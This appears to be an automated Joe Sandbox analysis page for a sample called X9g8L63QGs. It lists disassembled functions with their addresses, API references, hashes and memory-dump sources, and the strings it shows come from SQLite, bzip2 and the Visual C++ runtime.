                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
                                                                                                                                                                                                                                                                    • Instruction ID: 0f6437d9e5c5d9b9bbeaf34dd31ffce86bdd2fa834a4560557ed717986a441dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9091E1E2A086C186D7118B36D198ABE77E0FF40784F088636DB8E87695EF3CE955C744
                                                                                                                                                                                                                                                                    Function 00007FFB0C04B070 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
                                                                                                                                                                                                                                                                    • Instruction ID: 4420cf58725daae6a21a5e9791ce70a3dd4a569f79f3f07e8fed487c5966d514
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C281ADF2608A8287E7609F79D448BAE77A5FB44B84F448036EB8E47791EF38E445C704
                                                                                                                                                                                                                                                                    Function 00007FFB1C252604 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 2889003569-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: d60a8ffad84e6f064a5763a2c166d11077ba1814d2ca81799213d95430020a2c
                                                                                                                                                                                                                                                                    • Instruction ID: 518d7aa90dad55af3c0331f36428d65abab3b82f4cb9e60636a7fe804e4bb9fe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d60a8ffad84e6f064a5763a2c166d11077ba1814d2ca81799213d95430020a2c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9291C2F3A08B818BE710EB74E8482EE77A1FB067A8F204125EA8D17795DF38D595C740
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A9310 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 178COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • factory must return a cursor, not %.100s, xrefs: 00007FFB0C1A93FE
                                                                                                                                                                                                                                                                    • Base Connection.__init__ not called., xrefs: 00007FFB0C1A94B9
                                                                                                                                                                                                                                                                    • Cannot operate on a closed database., xrefs: 00007FFB0C1A94D3
                                                                                                                                                                                                                                                                    • SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FFB0C1A94F3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$factory must return a cursor, not %.100s
                                                                                                                                                                                                                                                                    • API String ID: 0-2953218143
                                                                                                                                                                                                                                                                    • Opcode ID: b86ca187cf45be0fdef249478a258149448544f65e464e611dbfdf5a566a5db7
                                                                                                                                                                                                                                                                    • Instruction ID: 20e0fa9e636069c2d81178db60e5126a38fd1653be618fee0967d7161eef7518
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b86ca187cf45be0fdef249478a258149448544f65e464e611dbfdf5a566a5db7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE8107F6A09A4286EB549F75E45897933A0FF45F94F4880B5CA0E47B98DF7CE886C700
                                                                                                                                                                                                                                                                    Function 00007FFB1C25ADD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-757766384
                                                                                                                                                                                                                                                                    • Opcode ID: 130e2d842e8b7dca47c2836e89f717505be4afbf408c40d13b3259f38f6b460e
                                                                                                                                                                                                                                                                    • Instruction ID: cdc83aa161dde91b44e98ac9c4c6c651f227246e365eb0ae61160f79802bf6fc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 130e2d842e8b7dca47c2836e89f717505be4afbf408c40d13b3259f38f6b460e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87716BE1A08F52D6EB14AF74D8490FA72A2BB067A0F644135CA4D03B98DF3DE960C790
                                                                                                                                                                                                                                                                    Function 00007FFB1C252DB0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB1C252DDA
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FFB1C255508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFB1C25108E), ref: 00007FFB1C255516
                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB1C252F2F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abort$__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: $csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 3000080923-1512788406
                                                                                                                                                                                                                                                                    • Opcode ID: 53f907965be1a88a6fd5fb15d1f71a23af454141565bf2445c328556a8274992
                                                                                                                                                                                                                                                                    • Instruction ID: f743a7510b7205ea03eb2e2609f932df8e3796fd7b73dc5802b1f2fdf737507f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53f907965be1a88a6fd5fb15d1f71a23af454141565bf2445c328556a8274992
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE71A2F2A08A8187D7619A35D4487FA7BA2EB06FA4F249135EA4C57785CF3CD891C780
                                                                                                                                                                                                                                                                    Function 00007FFB1C252394 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 2889003569-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: 9aa894c3c893ab74ee705d7221e0eb3435fed3f33ad5ca95d206f26215c5ec13
                                                                                                                                                                                                                                                                    • Instruction ID: 44ef81cfb9ffa9b5187ca4d2d209ad92e0c8de703c56b775e2896f9066273959
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa894c3c893ab74ee705d7221e0eb3435fed3f33ad5ca95d206f26215c5ec13
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 656191F2908B8582D724AB25E4443EAB7A1FB86BA4F144225EB9D03799DF7CD590CB40
                                                                                                                                                                                                                                                                    Function 00007FFB1C252B88 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB1C252BB0
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FFB1C255508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFB1C25108E), ref: 00007FFB1C255516
                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB1C252C7F
                                                                                                                                                                                                                                                                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFB1C252C8F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Frameabort$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 1245442199-3733052814
                                                                                                                                                                                                                                                                    • Opcode ID: 20a4f0483044e05ead07b9216d24a097e489e06d9183abde2aaa2290edabb471
                                                                                                                                                                                                                                                                    • Instruction ID: c1e4e37648697789b584d647f574f4554d920eaad5ec11786b1df72e00a6bec8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20a4f0483044e05ead07b9216d24a097e489e06d9183abde2aaa2290edabb471
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B6190F2908B4287EB60AB21D0482EA3692EB57BA5F244135EA5D877D5CF38E851C780
                                                                                                                                                                                                                                                                    Function 00007FFB1C2542F0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 135COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileHeader
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 104395404-1441736206
                                                                                                                                                                                                                                                                    • Opcode ID: cc2941d08898c29ec0b938c5700553895786508ed6a70616e0c5efaebfc34f81
                                                                                                                                                                                                                                                                    • Instruction ID: 63669e47486f99ebeca972e8ecacd367ec1b922b8f8206188798e4d6efde5a67
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc2941d08898c29ec0b938c5700553895786508ed6a70616e0c5efaebfc34f81
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B518EE2A09A5287EA60BB31D0485FEA6A2FF467A4F240135DF8D43755CF7CEC528681
                                                                                                                                                                                                                                                                    Function 00007FFB1BB11ED4 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 119COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: %d work, %d block, ratio %5.2f$ too repetitive; using fallback sorting algorithm$VUUU
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-2988393112
                                                                                                                                                                                                                                                                    • Opcode ID: 4b1c468c53f6403045b0b18d06b17fdc23e8f335e10cb80c9efd56bfef58ea73
                                                                                                                                                                                                                                                                    • Instruction ID: 0d3759838c67c32f0832ceffe8950b9c8edf11ef76edd8ae57312839c73ac3e2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b1c468c53f6403045b0b18d06b17fdc23e8f335e10cb80c9efd56bfef58ea73
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41A6BAA18A41C7E7249F36E44527A73A6FB84B64F106235DE0E53BB5DF3CD441C600
                                                                                                                                                                                                                                                                    Function 00007FFB1BB13A24 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: combined CRCs: stored = 0x%08x, computed = 0x%08x$ {0x%08x, 0x%08x}
                                                                                                                                                                                                                                                                    • API String ID: 0-2474432645
                                                                                                                                                                                                                                                                    • Opcode ID: 7d4c9588c4fc757401baa0773cfa85e09fcd74270353b5995134900e9188f0ce
                                                                                                                                                                                                                                                                    • Instruction ID: 8e059a7a1ed1b2e84c82f198e456f74ef77358453c15df3e53f104cf99b61c19
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d4c9588c4fc757401baa0773cfa85e09fcd74270353b5995134900e9188f0ce
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941A5B9A1ED42D6EB748F34E09037E2292FB44B64F14E235D90E86AE5EE3CA441C710
                                                                                                                                                                                                                                                                    Function 00007FFB1BB1A5A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID: Q2"e
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-2497648249
                                                                                                                                                                                                                                                                    • Opcode ID: e26e1e7f29a364d318d08a9c47668167dc9c5e6d7c755545a2497d229ed19d67
                                                                                                                                                                                                                                                                    • Instruction ID: dcb73aad10c883c3275b6541c0a807e214e2a25221b3a6b99b38f620e08775bf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e26e1e7f29a364d318d08a9c47668167dc9c5e6d7c755545a2497d229ed19d67
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81114C6AB14F058AEB10DF70E8553AA33A4FB187A8F042E31DA2D42BA4DF3CE1558340
                                                                                                                                                                                                                                                                    Function 00007FFB0C0A9750 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFB0C0A9F87,?,00000007,?), ref: 00007FFB0C0A9917
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2903559916
                                                                                                                                                                                                                                                                    • Opcode ID: efce2a594c8615c6195497c0eb65d48d2a67f449694f3429559b3ef3d31313fd
                                                                                                                                                                                                                                                                    • Instruction ID: 1c25b8b936a5143f8487b37e24dc6381904feb993db5c507442b5e17e6e45f4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efce2a594c8615c6195497c0eb65d48d2a67f449694f3429559b3ef3d31313fd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B1CEE2B0968285FA699F25D448BBA67A0EF41B84F494275DE5D0B7D5FF3CE801C308
                                                                                                                                                                                                                                                                    Function 00007FFB0C0B85A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFB0C0B8A6F), ref: 00007FFB0C0B8739
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFB0C0B8A6F), ref: 00007FFB0C0B87BB
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFB0C0B8A6F), ref: 00007FFB0C0B88AD
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
